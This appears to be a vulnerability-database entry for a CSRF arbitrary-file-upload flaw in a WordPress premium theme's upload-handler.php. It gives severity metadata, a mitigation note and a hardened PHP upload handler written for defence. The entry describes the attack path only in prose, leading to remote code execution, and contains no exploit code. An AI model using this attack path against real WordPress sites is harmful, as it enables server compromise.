Vendor: Wordpress Highlight Premium Themes
By: DevilScreaM
CVSS: 8,8 (HIGH)
CWE: 352 (CSRF)
Product Name: Wordpress Highlight Premium Themes
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mozilla, Chrome, Opera -> Windows & Linux
2013
WordPress Highlight Premium Themes CSRF File Upload Vulnerability
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the Wordpress Highlight Premium Themes. The upload-handler.php script does not sufficiently validate uploaded files, so an attacker can send a malicious request to the script and upload arbitrary files to the server, which can lead to remote code execution.
Mitigation:
The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the Wordpress Highlight Premium Themes.
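For anyone auditing a theme for the same class of bug, the following added example (not the theme's code and not the vendor's patch) shows the checks a WordPress upload endpoint needs to close both the CSRF and the arbitrary-file-upload paths. The action name `example_theme_upload`, the nonce field `nonce` and the form field `file` are hypothetical.

```php
<?php
// Added example: a hardened upload endpoint registered through admin-ajax.php
// instead of a directly reachable script inside the theme directory.
// Action, nonce and field names below are hypothetical.

add_action('wp_ajax_example_theme_upload', 'example_theme_handle_upload');
// No wp_ajax_nopriv_ hook is registered, so unauthenticated requests never reach it.

function example_theme_handle_upload() {
    // 1. CSRF: require a nonce minted for this action and the current user.
    //    check_ajax_referer() terminates the request if it is missing or invalid.
    check_ajax_referer('example_theme_upload', 'nonce');

    // 2. Authorization: a valid nonce is not a permission check.
    if (!current_user_can('upload_files')) {
        wp_send_json_error(array('message' => 'Forbidden'), 403);
    }

    if (empty($_FILES['file']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
        wp_send_json_error(array('message' => 'No file uploaded'), 400);
    }

    // 3. Allow-list of extensions and MIME types; everything else is rejected,
    //    including .php, .phtml and double extensions.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'],
        $_FILES['file']['name'],
        $allowed
    );
    if (empty($check['ext']) || empty($check['type'])) {
        wp_send_json_error(array('message' => 'File type not allowed'), 415);
    }

    // 4. Let core move the file into wp-content/uploads with a sanitized,
    //    unique name. test_form is off because the nonce was verified above.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload(
        $_FILES['file'],
        array('test_form' => false, 'mimes' => $allowed)
    );
    if (isset($result['error'])) {
        wp_send_json_error(array('message' => $result['error']), 400);
    }
    wp_send_json_success(array('url' => $result['url']));
}
```

The form that posts to this endpoint must embed a nonce created with `wp_create_nonce('example_theme_upload')`. As defense in depth, the web server should also be configured not to execute PHP from the uploads directory.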